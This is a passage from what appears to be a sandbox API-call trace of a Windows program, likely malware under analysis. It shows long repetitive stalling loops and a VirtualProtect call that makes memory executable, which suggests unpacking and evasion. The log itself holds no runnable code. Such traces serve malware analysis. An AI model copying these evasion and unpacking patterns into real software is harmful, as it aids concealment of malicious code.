(in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.696] GetACP () returned 0x4e4 [0130.696] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.696] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.697] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.697] GetACP () returned 0x4e4 [0130.697] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.698] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.698] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.698] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.699] GetACP () returned 0x4e4 [0130.699] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.699] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.700] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.700] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.700] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.700] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.700] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.700] GetACP () returned 0x4e4 [0130.700] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.701] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.701] GetACP () returned 0x4e4 [0130.701] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0130.702] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0130.702] GetACP () returned 0x4e4 [0130.895] VirtualProtect (in: lpAddress=0x635ac0, dwSize=0xf2eb, flNewProtect=0x40, lpflOldProtect=0x43ad04 | out: lpflOldProtect=0x43ad04*=0x4) returned 1 [0130.895] AddAtomA (lpString=0x0) returned 0x0 [0130.895] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.895] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.895] AddAtomA (lpString=0x0) returned 0x0 [0130.895] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.895] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.895] AddAtomA (lpString=0x0) returned 0x0 [0130.895] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.895] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.895] AddAtomA (lpString=0x0) returned 0x0 [0130.895] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.896] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.896] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.896] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.897] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.897] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.897] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.898] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.898] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.898] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.899] AddAtomA (lpString=0x0) returned 0x0 [0130.899] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.899] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, lpBuffer=0x4240e8 | out: lpBuffer="Module32FirstW") returned 0x51 [0130.900] AddAtomA (lpString=0x0) returned 0x0 [0130.900] FindCloseChangeNotification (hChangeHandle=0x0) returned 0 [0130.900] GetCurrentDirectoryA (in: nBufferLength=0x0, 